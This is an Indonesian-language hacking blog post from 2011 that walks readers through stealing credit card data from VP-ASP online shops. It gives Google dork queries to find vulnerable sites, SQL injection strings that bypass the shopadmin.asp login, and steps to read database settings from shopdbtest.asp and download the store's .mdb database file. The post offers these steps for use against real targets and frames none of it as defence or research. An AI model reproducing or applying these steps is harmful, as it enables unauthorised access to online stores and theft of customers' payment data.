RSS

Memanen Data Kartu Kredit dari VP ASP Shopping Card

20 Sep

Mencari Target Dengan Google Hacking

Ketik cobalah salah satu kata kunci berikut pada mesin pencari Google:

  • allinurl:shopadmin.asp
  • allinurl:vp-asp

SQL Injection

Misalnya target Anda dari hasil pencarian Google adalah:

http://www.spyrozone.net/shopadmin.asp

Cobalah mengakses halaman tersebut. Anda akan diminta untuk memasukkan username dan password. Cobalah kedua account berikut:

  • Username: ‘or”=’
    Password: ‘or”=’
  • Username: admin
    Password: ‘or”=’

Jika berhasil, Anda kini memiliki kontrl penuh terhadap CMS ;)

Download Database

Sekarang, kita akan memanfaatkan celah keamanan lain untuk mendapatkan informasi-informasi sensitif. Cobalah mengakses shopdbtest.asp. Karen atadi targetnya http://www.spyrozone.net, maka ketik pada URL:

http://www.spyrozone.net/shopdbtest.asp

Akan tampil variabel-variabel sensitif. Anda cukup memperhaikan 2 variabel yang paling menarik, yaitu:

  • xDatabase
  • xDblocation

Misalnya nilai pada:

  • xDatabase = spyrodatabase
  • xDblocation = spyrokid

maka file databasenya terletak pada folder /spyro/ dengan nama spyrodatabase.mdb. Untuk mendownloadnya, ketik URL:

http://www.spyrozone.net/spyro/spyrodatabase.mdb

Bukalah file spyrodatabase.mdb dengan Microsoft Access untuk melihat isi databasenya.

Sekian, semoga bermanfaat

 
Tinggalkan komentar

Ditulis oleh pada 20 September 2011 in Dunia Hacker

 

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

 
%d blogger menyukai ini: